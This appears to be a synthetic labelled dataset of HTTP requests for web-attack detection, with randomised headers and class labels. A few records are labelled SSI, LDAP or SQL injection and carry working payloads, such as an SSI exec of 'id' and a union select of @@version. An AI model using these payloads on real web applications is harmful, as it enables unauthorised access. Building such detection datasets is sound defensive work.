Via: HTTP/2.5 www.rncypi8.shtml, FTP/2.1 www.dtCsn.html, 4.4 243.206.160.219:94411
Transfer-Encoding: gzip
Upgrade: t4mc/3.8
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 8.124.182.71
X-Serial-Number: 759836500
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4.qFpnph-6q=69&ehuctlNSe=a3pWHqpq&nu=010&neoo9etA=Hoo

End - Id: 5401
Start - Id: 9
class: Valid
GET /i4tBn0QTpvx/l6NstqM5eOe/rh-ELinsertPaTUC1bgsound/rh/dFwpV/thnosoZt6otNteic.css?ee1cei1gra=sfhsn&eCxr1HD=179087&s0evtkE54Pnio=774&3iEtk1totl=nQI9s_8&eusee=0553388 HTTP/1.0
Host: 139.114.196.243:0346
Connection: wBiOn
Accept: image/jpeg, video/*
Accept-Charset: ks_c_5601-1987, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: Za-5dOiioi;q=0.3, oe-h, wrgoLrA-Ydyutlel
Cache-Control: only-if-cached
Client-ip: 198.201.173.41
Cookie: oarraatavd=tisrP3n5mopsy;C.psdnB=87378
Cookie2: $Version="8"
Date: Tue, 07 Apr 09 20:02:27 CET
ETag: W/"8iZ39RWZewgvp0wTVy"
Expect: 100-continue
From: 4atoe@ehNulvLa.net
If-Modified-Since: Mon, 14 Jan 08 23:43:42 UTC
If-Unmodified-Since: Wed, 29 Nov 06 01:48:48 CET
If-Match: "Ea4h_iuEGBpuhik0E"
If-None-Match: "LpnoLelb7twMFrynvu"
If-Range: *
Max-Forwards: 79
MIME-Version: 6.7
Pragma: no-cache
Authorization: Digest qop=auth
Range: -8,-6
Referer: /5dlstdij/ar9nTe5/k4tastn/lnxistgh/ieHgt.wav
TE: deflate,gzip,gzip;q=0.7
Trailer: Host
User-Agent: Mozilla/8.2 (Windows; U; WinNT 6.0; mr-is; rv:6.3.5) Gecko/82604624
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color8
Via: HTTP/8.1 172.254.186.232:6108, FTP/2.6 222.98.171.160:50
Transfer-Encoding: compress
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 157557837076027

null

End - Id: 9
Start - Id: 20825
class: Valid
GET /5_ew-lZ2fYK/m5ALxa@3rC/m_I/iutqg4harvd/nionf.php4?Kyirenp=tti4eEnoa%3B&Nib=pe0locationz61eo3n%28rAen%29oh HTTP/1.0
Host: 169.209.99.38
Connection: close
Accept: */*
Accept-Charset: euc-tw, x-mac-arabic, windows-1258;q=0.9, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7617
Client-ip: 187.246.147.234
Cookie: 7lsJ@NEFOO2lW=a:;an3uldi=rcRyyA9
Cookie2: $Version="1"
Date: Tue, 24 May 05 11:19:08 UTC
ETag: W/"DeYc6lmQl-YJGqzsxV"
Expect: nmao=teaea;oidrhia
From: itbAy3@24cao.it
If-Modified-Since: Fri, 15 Sep 06 07:44:39 UTC
If-Unmodified-Since: Sat, 26 Feb 05 23:22:23 CET
If-Match: "-GnloiBoNd9sfLY7fW9B"
If-None-Match: *
If-Range: Thu, 22 Nov 07 17:45:12 CET
Max-Forwards: 7463
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: oCeaVw h5ecsw=ezyieu
Authorization: xnem eahs=0nmz
Range: 72115-,9-3120,919774-69202
Referer: /OyIhant/trlaztw/yrssla/3efan/eamd.jsp
TE: trailers,deflate
Trailer: Via
User-Agent: Mozilla/8.1 (X11; U; Solaris 7.8; zd-hr; rv:2.3.4) Gecko/67273975
UA-CPU: 68000
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/6.9 www.posoNIm.html, 5.2 101.99.10.1, 1.6 www.4yale.shtml:56068
Transfer-Encoding: identity
Upgrade: nfoEet/4.4, cNiaOe/9.4
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20825
Start - Id: 40014
class: SSI
GET /zQ55qxToOQ/JcZ1varg/cum5hcape0ew/gaqVKO/uoinIlsouUoettx/ngnEs/alos98freugc/aH92Ghb0a1hkP/arRciTnarrtteiour/like3kJzXwinnt28m/bDbNPXI0WZD.php?uvfLKvoreplace=eyeomw+&iaps=+0doi&woamtieioh=838923819&alw2uege=eCymddOae9j&.A3Uaeh=wzs&enrsna5ei9=3954&i5=60&9A.b=54853&6oNncnejOdlleec=9289&sqMX_exG7LOunion=xS%406WnRgnS66&ifennmu=06917&82.qoVq=megi5&wbgr=%3C%21+++%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&rnsaen8=2t6eg&h5uV=qDGzEAJCF3Q HTTP/1.0
Host: www.wDthYnwteo.ch:8
Connection: Rnta
Accept: */*
Accept-Charset: euc-jp, iso-10646-ucs-2, macintosh
Accept-Encoding: compress;q=0.0
Accept-Language: mU-rnhelarm
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Sat, 13 Feb 10 10:14:49 CET
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: ieg6l
From: l1ahde@nablau.fr
If-Modified-Since: Sun, 18 Apr 10 15:49:59 CET
If-Unmodified-Since: Sat, 30 Aug 08 14:40:41 CET
If-Match: "DBi-CJQy63mNzKEzv"
If-None-Match: *
If-Range: Fri, 13 Jan 06 18:03:33 GMT
Max-Forwards: 167
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: Basic ZXltZWY6dWhkcG5l
Range: -1534
Referer: /uleio/tciel/Tffalptj.css
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: oEhplsSI (o-I5tqc; 9Fcc2uR-Iy; eiHa5VB; ltWfiC22)
UA-CPU: Sparc
UA-Disp: 5489,849,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5394x1347
Via: HTTP/0.6 www.gnreay.jpg, 8.5 122.236.31.213:8
Transfer-Encoding: identity
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40014
Start - Id: 38289
class: LdapInjection
GET /tCVe._fUCcrHx3vseNHQ/rllprdo.sh?WehsD=6155243&ieH3bwd1jx=ifMNwB.&osmkeeaNhapere=3&eibcd1ercld=104&JaSje2B_QYlocationu=6sitw%29%28%7C++%28ow%3D*%29&ipcMh6ccnfs7I=feguxb&9erUc-=earaRSbnwrtoeeLty HTTP/1.1
Host: 121.60.3.72:80
Connection: dagfia
Accept: text/*;q=0.5, audio/x-wav;q=0.4, audio/*;q=0.6
Accept-Charset: iso-8859-3;q=0.4, iso-2022-jp;q=0.8, iso-8859-9, euc-kr, x-mac-icelandic;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=69
Client-ip: 166.82.60.199
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="4"
Date: Fri, 17 Sep 04 16:10:35 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Tue, 10 Feb 04 23:52:01 UTC
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: Fri, 31 Oct 08 03:59:05 GMT
Max-Forwards: 6306
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic c21lZXJFaTp5b25haEVN
Range: 339-28315
Referer: /sCmrh/ngpucao1/btnea/iathi/cisa.avi
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 5.3; 7f-nR; rv:6.1.3) Gecko/26683108
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: 9MOLse
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38289
Start - Id: 29642
class: Valid
GET /0aE/n18no6oetinoyl0aasre/tQebhi/enornattqyobvI.mdb?ikdacteEs=9726&arhet=pqmbehfaa3&NMal8jxiQ=x1uk3-wx1T&kjssr4iEtmtsnr=hTkwinnt%3EkTiNdtndhnqh-ei&Tois=0456&tonoemaonIasqol=eml0di%7Eexecett%29ncnh%26Emes&Yhaving%ulibyNjMnc=eeehpnph-ror+H%7Eciit+x+&_Pmb@Hcatsnj=8aaetcbnc3erycv&wnftsse=otutelnetm%7E%25t&glvaNsrtL9ss=%40e1lh&Uotld=4415063446 HTTP/1.1
Host: www.yfoteraiee.org
Connection: close
Accept: application/postscript, image/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, compress;q=0.2, identity;q=0.7, identity;q=0.8
Accept-Language: *
Cache-Control: Td=brn
Client-ip: 180.238.202.202
Cookie: 9ttzKeKeJqgs=lRi;Seaeo=kotAeuA7apinVEa;@.evalus=walrtfhisit;9NrmU=05757204
Cookie2: $Version="56"
Date: Mon, 29 Oct 07 16:02:10 GMT
ETag: "r.s7n0-uRrEudhUkuM"
Expect: 100-continue
From: serlgoma@7stltqn9.org
If-Modified-Since: Sun, 25 Jan 09 10:03:32 CET
If-Unmodified-Since: Sat, 20 Nov 04 23:58:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.3
Pragma: lmeee=ao
Proxy-Authorization: aaia arnindeT=eleO6
Authorization: Basic b2FucG9paDppdDQw
Range: -146,1-593943,-3282
Referer: /s9nae2.dll
TE: chunked,chunked;q=0.7
Trailer: Authorization
User-Agent: nwlooenEzi8r
UA-CPU: 68000
UA-Disp: 0934,579,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8055x615
Via: HTTP/2.0 191.241.177.116, HTTP/3.2 www.elua.jpg
Transfer-Encoding: oiejii
Upgrade: ltes/7.9
Warning: 842 191.175.28.20:7552 "Rsyggrjuilniiaoo" "Sun, 10 Feb 08 01:16:21 GMT"
X-Forwarded-For: 104.233.161.204
X-Serial-Number: 149051815209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29642
Start - Id: 3128
class: Valid
GET /tJ8w@Qw@5/poforianfletapIs/ux8eqqh/ehV/uc4fjrcsalAlcmitwgfh/rytW9x2d/sjauDaOiZ0b21/@4wgetastdin-p/iIA/etyoRotnxoaRo/iuxVzXXH6/winntJA1.swf?taa=98281737&Ia4thspu=60453852 HTTP/1.0
Host: www.8ipBnncos.biz:80
Connection: Osysot
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: awui-aloeg, t-eetyis;q=0.5, mhraeIrp-2io;q=0.6
Cache-Control: min-fresh=79456
Client-ip: 53.213.84.202
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="133"
Date: Fri, 23 Apr 04 19:56:30 GMT
ETag: W/"IFXJH7fpY2ax3@6hp"
Expect: aahb=foha;meRl7
From: eead@01e8oq1.gov
If-Modified-Since: Fri, 02 Feb 07 12:25:02 UTC
If-Unmodified-Since: Thu, 29 May 08 02:28:36 CET
If-Match: "rdT3btif2dxfJ2ImA"
If-None-Match: *
If-Range: Tue, 06 May 08 14:55:21 CET
Max-Forwards: 7699
MIME-Version: 8.6
Pragma: e='di6ta'
Proxy-Authorization: Basic OGlhbnVyb2U6ZGZqb2VyZWE=
Authorization: NTLM YW9iaGF0c3VlQ28ydGVwZ2U1dGVzeXRlYnRuMnpndXJvczgyY2E=
Range: -6106,0309-,1-
Referer: /ptulp/rnga/vhe44ic/mea2/etYos.pl
TE: deflate;q=0.4,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: xuiueusec (lqOjLz1; wcvdsYX; a1yw8KS; eWqX6LDJ; eiwuB.QxWX)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5219x775
Via: 4.2 www.etie.tiff, 1.0 www.hfpeehet.shtml, 6.7 www.tohea.png
Transfer-Encoding: laal
Upgrade: qtipy/8.0, crocn/6.7, lns/3.2, psbneW/8.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3128
Start - Id: 2161
class: Valid
GET /dlHc2nheoeaittasi/lGbPw-m9/P5cSzrZbWf/y2siNawvatuetri.htm?rvk=dincludei&dis=963035&Eidtry=h&tNdetrlohe=tSAXgl&ouwbH=ld4nz4xtermewotup%29k&een=nnuieebSfjew&r82n=Btc%3A&ilzFzlOirah=aljniansa%7EEHtSd%28%24&eoyn=txAGf9DyWd&yMoqaFI=emgohloeUeeOta9&arwcyleedyma5=scc4fnTrsebfbwt7xt&3NLIj=ngBBIGGy7j&u.rmX.areplaceO-x9F=36044897 HTTP/1.1
Host: www.lHrona.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, gzip
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 82.66.17.224
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Thu, 31 Aug 06 08:41:38 CET
ETag: W/"8W@tE7VPqpr7@AJ_mN_"
Expect: 100-continue
From: cwaupt@0tmyctatse.net
If-Modified-Since: Mon, 24 Mar 08 05:35:03 GMT
If-Unmodified-Since: Wed, 11 Mar 09 03:43:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jun 06 20:36:33 GMT
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -5,61-,-809
Referer: /6taKsabP/3jreedr.swf
TE: gzip
Trailer: Connection
User-Agent: eaA3nesdn (uTY3cNATi; hzKGrIqeI8)
UA-CPU: MIPS
UA-Disp: 563,121,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: HTTP/6.8 www.htoSls.gif
Transfer-Encoding: identity
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 9895241717803854226
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2161
Start - Id: 32056
class: Valid
GET /xe3te/8oJG-WS9Pm6.Ioij.H1/orO6sunkSilirhcere.asp?acceptgall1pc=793906&UtutsUhe=5&kd3eledTeqinne=rhW48RGs&XmTNstyle=Hlttcfrome&rubne=ek2Rj&sTnno0ho5nem=s1alVycre&rjio=eo1rilatsIcnNm&y2lf=Arloebw5&wnd8rbladeawEan=lQiGVfL&dberNxr=ey&gpkla=mrs1cEh96hht&hubnApoene=d25hu5n5 HTTP/1.1
Host: 65.49.122.153
Connection: close
Accept: audio/x-wav, video/*, image/png;q=0.7
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.7, compress;q=0.8
Accept-Language: vkHoev-1ynU3, i-oimm;q=0.6, o-aIc7mqBj, sann-d;q=0.0
Cache-Control: max-stale=70
Client-ip: 83.23.198.140
Cookie: oiesUDiad0ptn=9707116;ett7eeda=nsn-:enph-oa;teSnpeacraion=whuwFiBR;eomg=547212;sk9=546788;zls=6970317
Cookie2: $Version="7"
Date: Mon, 14 Nov 05 21:48:04 UTC
ETag: "CpglYrZDfQpIIygqI"
Expect: 100-continue
From: hGao@Hawa.uk
If-Modified-Since: Mon, 22 Nov 04 24:18:30 UTC
If-Unmodified-Since: Fri, 05 Nov 04 22:42:30 CET
If-Match: "H2yvcz8RPHX.d1gK"
If-None-Match: *
If-Range: Sun, 06 Jan 08 17:40:53 UTC
Max-Forwards: 87
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic aGx1ZTppbHJ0ZQ==
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: /canhw/Atf9tte/degeOn.msf
TE: chunked;q=0.5,gzip
Trailer: Authorization
User-Agent: iTtso7nt
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.3 www.oiohEin.jpg, FTP/8.7 www.eilxm.png
Transfer-Encoding: compress
Upgrade: Leh/7.4, odi/8.1
Warning: 652 183.221.129.170 "snnhhrllRstie" 
X-Forwarded-For: 211.198.61.151
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32056
Start - Id: 32592
class: Valid
PUT /eio/akZSc8XrBShTZMhDLp/sfBZNkFW8-/rdeilo1ewu5smehgaeoa/eBGchh5d/qpftDQIfFclaOswv/3connect@y0eQHd/e3M.SbeYfN/jnseenn0ptgs/DyJHKWf3CTR-z4a/8NpVVbuGi-@TrM/iN.V5-ivC_VP.gif? HTTP/1.0
Content-Length: 86
Content-Language: sz,s,acw3Td
Content-Encoding: deflate
Content-Location: http://yt0lead.it/itglxcs.js
Content-MD5: dG5hdGljbXJ1M28yYXpwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 19:38:19 CET
Last-Modified: Fri, 05 May 06 16:43:03 GMT
Host: 65.67.217.211
Connection: keep-alive
Accept: video/mpeg, video/*, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: udmu-hAx3neet, cOjeao-tnii, o7reo-e;q=0.5
Cache-Control: only-if-cached
Client-ip: 96.136.140.247
Cookie: ixm0oliose=595
Cookie2: $Version="27"
Date: Thu, 11 Jun 09 05:37:44 UTC
ETag: "lYsE4UvE6HaItzCeVZ"
Expect: 6exi=cgahot
If-Modified-Since: Tue, 07 Dec 04 17:41:31 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: "2qUF84HW_KExFLwjP"
If-None-Match: "zP7e.c@sfzoG7Kk"
If-Range: Mon, 06 Nov 06 13:50:18 CET
Max-Forwards: 8583
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: ttuo3 keteeat=beezene1
Authorization: Basic bm9ldDplaGRzbzZP
Range: -619576,782-7
Referer: http://CRdutl.com/roao6/issncmt/cyeedsh/sglt.msf
TE: trailers,deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/7.3 (compatible; MSIE 9.3; WinNT; Tyksi; tasottLh0s)
UA-CPU: Sparc
UA-Disp: 5355,389,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 744x9728
Via: 5.1 www.eqabet.html, 5.1 193.69.55.18
Transfer-Encoding: deflate
Upgrade: fim4i/1.8, mvMta/2.8, jo9ve/6.8
Warning: 560 61.58.173.87 "aNahir0tmoon5em" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

scripti1wnedb7R=5ont6eihoe3a&m05s=aam3&ebu=4&edaoer6iyn=20&tmdmfessq=opN&ac=Hpasswd3l3

End - Id: 32592
Start - Id: 19273
class: Valid
GET /gonslt/_6_KqY/aZItqYQGaRS.t/f8LQFxPxF.cT/1ISYcWoAy2tQ.w3-uOjv/os/ak8/qb_IPAdXT9/aemyw8yohv/R7m3Uinr2.php?ezadolnteiac=laaVW&sgii=e%24%3Fef&UN@csUUHVQtelnetm=03996&0l0euione=d.ILkQ0LReA&.nKxfMu5b=dhaosbco2hYoIiess&R9rw=pe+el%2F&aopan=aconnectr&rtaid=7396&to8vrmdToad=w5krr&ldNrtsl2s5a=47&abpO=includeIoftlogegjp&saap2ta=89&pdieu5latt=Oimn&et82Oleb=aaQ&ona6ie=tennihestfef1zemY HTTP/1.1
Host: 254.251.255.94
Connection: keep-alive
Accept: text/html;q=0.9, application/x-tar
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 70.40.223.207
Cookie: co=47436
Cookie2: $Version="0"
Date: Wed, 28 May 08 23:57:53 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sat, 27 Feb 10 17:09:21 GMT
If-Unmodified-Since: Tue, 31 Jul 07 16:37:47 CET
If-Match: *
If-None-Match: "yOOVf2_wycUCcGyy"
If-Range: "GIJZft8ruLYXSsC7"
Max-Forwards: 29
MIME-Version: 5.9
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: tisen yeolbcot=iseyfh
Range: 784688-250,21331-
Referer: http://ntrO.fr/bmThi8ha/crMlon.mpg
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: ouA0g (1aSB4G; u_jMpmcOXF; eoTIAXpOb; sgbXoSPww)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3141x1930
Via: FTP/4.9 11.22.49.102, 1.0 152.206.166.162
Transfer-Encoding: deflate
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 197 33.215.121.199 "ikjti0rMM2eujtmcrtse" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19273
Start - Id: 34432
class: Valid
POST /TNla/sjiOSc.ZEQTJpGjEzz0/sdxgyhzemtageom/aDXFdcEYzP2rZmN/oYIWMv_LpswqDur@/Gneesn/ecw0DsCkyjjXBlzkhe/LSd/lIN.asp? HTTP/1.0
Content-Length: 151
Content-Language: untEhxl
Content-Encoding: gzip
Content-Location: /2carcie.nsf
Content-MD5: bW54eVBvcnM1bGFmNE5ucw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Jul 09 20:07:22 CET
Last-Modified: Tue, 22 Jan 08 18:27:18 GMT
Host: 185.204.61.37:80
Connection: close
Accept: */*
Accept-Charset: windows-1258, iso-8859-8-i;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 48.191.175.197
Cookie: a75krdhpES=0346228
Cookie2: $Version="5"
Date: Tue, 14 Sep 04 15:24:07 UTC
ETag: "YmD8dsC0cRiYgrZ"
Expect: xz4epdk=csynkvu;uisaLsd=eOot4
From: uoYw@lieOqhc.ch
If-Modified-Since: Fri, 14 Dec 07 21:13:08 UTC
If-Unmodified-Since: Thu, 07 Sep 06 19:59:20 CET
If-Match: "DvhCNCwOgahdJimkGf"
If-None-Match: "dx_iENPGHeTs3C@u49x"
If-Range: "BRuQt@lkQjeKf2uzNez"
Max-Forwards: 3529
MIME-Version: 8.4
Pragma: O4=nit9da6m
Proxy-Authorization: if1e8w idii=psa0
Authorization: NTLM bm1nNGJ0SmxzZXNEaWFpdGxmMG1mY3BpaGEzb2Rjdm91ZlRpZXI2aXZu
Range: 80-9150
Referer: /9hfed/rtQeisp/dsam/itcmt/wtbO.tiff
TE: trailers,deflate
Trailer: Pragma
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 6.0; ea-ju; rv:7.8.1) Gecko/68359321
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: 7.2 www.urM6.gif, 3.0 6.158.48.192
Transfer-Encoding: identity
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 308 www.np7yn.htm:41 "n0igvvaqAhh5Jitr5oc" "Sat, 07 Mar 09 13:36:33 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.qftpBoTx=pe&2o4fSxp_=ugVm3ahsMBWb&xrO=w7T4guD&9CttfeweC=etcs<s&lirtimjp5nGrt=%usS onullpnpe&ubxR9m=tGsock_stream(eyhenbihise(i&rxscnr=29679745

End - Id: 34432
Start - Id: 10843
class: Valid
GET /Mod6eeyiio/Slnd/uEYGtAPS2PgYv@4S.js? HTTP/1.1
Host: 244.108.52.230
Connection: close
Accept: audio/x-wav;q=0.1, video/*
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 217.184.252.45
Cookie: tf1atgsO=fwbng;ftenaEcl2=293803
Cookie2: $Version="4"
Date: Tue, 21 Mar 06 23:33:31 GMT
ETag: W/"9022KEqpeEndTEr45.VR"
Expect: sihdulZC
From: trEiqi@nmhAerd7.st
If-Modified-Since: Sat, 04 Jun 05 06:30:34 GMT
If-Unmodified-Since: Sat, 19 Jun 04 04:43:51 UTC
If-Match: "0QwDrLs0CYOaE9M.Sq"
If-None-Match: *
If-Range: Sat, 05 Sep 09 15:48:00 GMT
Max-Forwards: 039
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: e4Gn esD1thd=Vlld
Authorization: Digest uri=/samreir/LeceOENt/ntewh/oneeu.rar
Range: 4-714445,-073,95110-496
Referer: /tenaw/tu1a/3a5e/duazlp/l7bqe.mdb
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: b6mO_4_Z http://www.WsnaeplY.fr
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: 3.5 www.cmon7sci.gif:7
Transfer-Encoding: deflate
Upgrade: clli/2.2, tee/6.7, b4acRj/4.6, raese/1.9
Warning: 821 192.39.173.188:50926 "iiEwc" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 907495686273869
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10843
Start - Id: 35342
class: SqlInjection
GET /oggfRO3-07/YmssF_havingN/aL/eglRrxlngoxtX/avgojrmbW/iS1bA4/qltnpeea.shtml?ndhei=%27++union+select++++%40%40version%2C1%2C1%2C1-- HTTP/1.0
Host: www.cynv.de
Connection: close
Accept: image/gif;q=0.6, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.9, gzip;q=0.2, compress, compress
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="2"
Date: Wed, 30 Jul 08 13:52:49 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Tue, 27 Dec 05 21:51:56 CET
If-Match: *
If-None-Match: "C7Nh05c5Q7LxnnlKiVC"
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: 4uNtt fsb8x=wPysovEa
Range: 16442-228208
Referer: http://so8e.be/riasi/pyaw2.pl
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: oean/6.3.3.8.1
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.1 163.38.67.127, HTTP/8.7 www.1rwi.shtml, HTTP/7.1 www.tdrdo24t.jpg
Transfer-Encoding: compress
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35342
Start - Id: 49053
class: XPathInjection
